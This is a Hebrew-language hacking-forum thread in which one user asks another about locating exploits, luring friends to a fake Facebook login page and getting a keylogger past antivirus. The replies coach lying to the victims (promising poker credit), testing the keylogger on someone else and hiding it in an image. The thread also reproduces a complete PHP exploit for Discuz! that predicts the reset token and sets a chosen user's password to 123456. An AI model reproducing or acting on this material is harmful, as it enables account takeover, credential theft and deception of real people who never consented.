יוסקה בקשר לפישינג+קילוגר+אקספלויט

[eliom]

שלום לך יוסקה.
3 שאלות אליך שהם לא כלכאך מובנים לי.
א)במדריך שלך לקימפול אקספלויט לא מובן איך מחפשים אקספלויט
ואיך אפשר לזהות אקספלויט שמתחיל בשפת פרל ואיך מזהים את גרסת האתר?
(במדריך שלך אתה לא הסברתה את זה)תן דוגמא.
ב)ובקשר לפישנג יש לי כבר כתובת פישינג באתר אחסון.
והשאלה שלי שאם אני שולח לחברים את הקישור של הפישינג מה יגרום להם להתחבר.
כי הם יודעים שזה דף של פייסבוק.
ג)עשיתי לפי המדריך שלך להכנת קילוגר וניסיתי ניסיון להפעיל את הקובץ בעצמי.
ולא הגיעו לי שום סיסמאות למייל.ומי שאני שולח לא את הקובץ וינסה להפעיל אותו
האנטי וירוס לא מתריע?.
תודה רבה.

[Yoske]

א)במדריך שלך לקימפול אקספלויט לא מובן איך מחפשים אקספלויט
ואיך אפשר לזהות אקספלויט שמתחיל בשפת פרל ואיך מזהים את גרסת האתר?
(במדריך שלך אתה לא הסברתה את זה)תן דוגמא. - יש את האתר מילווארם לחיפוש.
כדי לזהות קוד בפרל, הקוד מתחיל ב :
#!/usr/bin/perl - אם הוא מתחיל ככה, זה פרל.
כדי לזהות גרסאת אתר בד"כ רשום לך בתחתית הדף.



ב)ובקשר לפישנג יש לי כבר כתובת פישינג באתר אחסון.
והשאלה שלי שאם אני שולח לחברים את הקישור של הפישינג מה יגרום להם להתחבר.
כי הם יודעים שזה דף של פייסבוק. - תחרטט ? אתה לא יודע לשקר קצת ?
תגיד להם שאם הם נכנסים מהאתר שלך זה מוסיף כסף בפוקר.
תגוון אני יודע..


ג)עשיתי לפי המדריך שלך להכנת קילוגר וניסיתי ניסיון להפעיל את הקובץ בעצמי.
ולא הגיעו לי שום סיסמאות למייל.ומי שאני שולח לא את הקובץ וינסה להפעיל אותו
האנטי וירוס לא מתריע?. - יש לך קובץ עריכה במחשב, זה לא יעבוד.
אתה חייב לנסות על מישהו אחר.

[eladking]

יוסי מילוורם כבר מזמן אבל מזמן לא עובד..אחרי שמי שניהל את האתר נפטר אז סגרו אותו..
י שאתרים אחרים כמו Inj3ctor משהו כזה
וexploit-db

[Yoske]

לא נכנסתי למילוורם כמה חודשים טובים - למה אתה מצפה ?

[eliom]

א)במדריך שלך לקימפול אקספלויט לא מובן איך מחפשים אקספלויט
ואיך אפשר לזהות אקספלויט שמתחיל בשפת פרל ואיך מזהים את גרסת האתר?
(במדריך שלך אתה לא הסברתה את זה)תן דוגמא. - יש את האתר מילווארם לחיפוש.
כדי לזהות קוד בפרל, הקוד מתחיל ב :
#!/usr/bin/perl - אם הוא מתחיל ככה, זה פרל.
כדי לזהות גרסאת אתר בד"כ רשום לך בתחתית הדף.



ב)ובקשר לפישנג יש לי כבר כתובת פישינג באתר אחסון.
והשאלה שלי שאם אני שולח לחברים את הקישור של הפישינג מה יגרום להם להתחבר.
כי הם יודעים שזה דף של פייסבוק. - תחרטט ? אתה לא יודע לשקר קצת ?
תגיד להם שאם הם נכנסים מהאתר שלך זה מוסיף כסף בפוקר.
תגוון אני יודע..


ג)עשיתי לפי המדריך שלך להכנת קילוגר וניסיתי ניסיון להפעיל את הקובץ בעצמי.
ולא הגיעו לי שום סיסמאות למייל.ומי שאני שולח לא את הקובץ וינסה להפעיל אותו
האנטי וירוס לא מתריע?. - יש לך קובץ עריכה במחשב, זה לא יעבוד.
אתה חייב לנסות על מישהו אחר.

על איזה קובץ עריכה אתה מדבר תן הסבר לא מובן לי.

[eliom]

ומי שמפעיל את הקילוגר האנטי וירוס לא מתריע?

[eliom]

ונגיד שמצאתי בתוכנה FreePortScanner שהדגמתה.
שפורט 80 בצבע ירוק איך אפשר לדעת באקספלוייט שחיפשתי
שזה פורט 80?

[Yoske]

מתריע.
אבל אפשרי להחביא אותו בתמונה או בקובץ.

[eliom]

ונגיד שמצאתי בתוכנה FreePortScanner שהדגמתה.
שפורט 80 בצבע ירוק איך אפשר לדעת באקספלוייט שחיפשתי
שזה פורט 80?
והנה דוגמא האקספלויט הזה זה פורט 80?ואיפה רואים פה את הגרסה של האתר?
Discuz! Remote Reset User Password Exploit
==========================================


#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Discuz! Reset User Password Exploit
by 80vul
+---------------------------------------------------------------------------+
');

if ($argc < 6) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user mail uid
host: target server (ip/hostname)
path: path to discuz
user: user login name
mail: user login mail
uid: user login id
Example:
php '.$argv[0].' localhost /discuz/ 80vul 80vul@80vul.com 2
+---------------------------------------------------------------------------+
');
exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$mail = $argv[4];
$uid = $argv[5];

$fp = fsockopen($host, 80);

$data = "GET ".$path."viewthread.php HTTP/1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "Keep-Alive: 300\r\n";
$data .= "Connection: keep-alive\r\n\r\n";

fputs($fp, $data);

$resp = '';

while ($fp && !feof($fp)) {
$resp .= fread($fp, 1024);
preg_match('/&amp;formhash=([a-z0-9]{8})/', $resp, $hash);
if ($hash)
break;
}

if ($hash) {
$cmd = 'action=lostpasswd&username='.urlencode($user).'&email='.urlencode($mail).'&lost pwsubmit=true&formhash='.$hash[1];
$data = "POST ".$path."member.php HTTP/1.1\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Referer: http://$host$path\r\n";
$data .= "Host: $host\r\n";
$data .= "Content-Length: ".strlen($cmd)."\r\n";
$data .= "Connection: close\r\n\r\n";
$data .= $cmd;

fputs($fp, $data);

$resp = '';

while ($fp && !feof($fp))
$resp .= fread($fp, 1024);

fclose($fp);

preg_match('/Set-Cookie:\s[a-zA-Z0-9]+_sid=([a-zA-Z0-9]{6});/', $resp, $sid);

if (!$sid)
exit("Exploit Failed!\n");

$seed = getseed();
if ($seed) {
mt_srand($seed);
random();
mt_rand();
$id = random();

$fp = fsockopen($host, 80);

$cmd = 'action=getpasswd&uid='.$uid.'&id='.$id.'&newpasswd1=123456&newpasswd2=123456&ge tpwsubmit=true&formhash='.$hash[1];
$data = "POST ".$path."member.php HTTP/1.1\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Referer: http://$host$path\r\n";
$data .= "Host: $host\r\n";
$data .= "Content-Length: ".strlen($cmd)."\r\n";
$data .= "Connection: close\r\n\r\n";
$data .= $cmd;

fputs($fp, $data);

$resp = '';

while ($fp && !feof($fp))
$resp .= fread($fp, 1024);

if (strpos($resp, '?????????,?????????') !== false)
exit("Expoilt Success!\nUser New Password:\t123456\n");
else
exit("Exploit Failed!\n");
} else
exit("Exploit Failed!\n");
} else
exit("Exploit Failed!\n");

function getseed()
{
global $sid;

for ($seed = 0; $seed <= 1000000; $seed ++) {
mt_srand($seed);
$id = random(6);
if ($id == $sid[1])
return $seed;
}
return false;
}

function random($length = 6)
{
$hash = '';
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
$max = strlen($chars) - 1;
for ($i = 0; $i < $length; $i ++)
$hash .= $chars[mt_rand(0, $max)];

return $hash;
}

?>



# Inj3ct0r.com [2008-11-22]

[eliom]

יוסקה למה אתה לא עונה על השאלה האחרונה ששאלתי?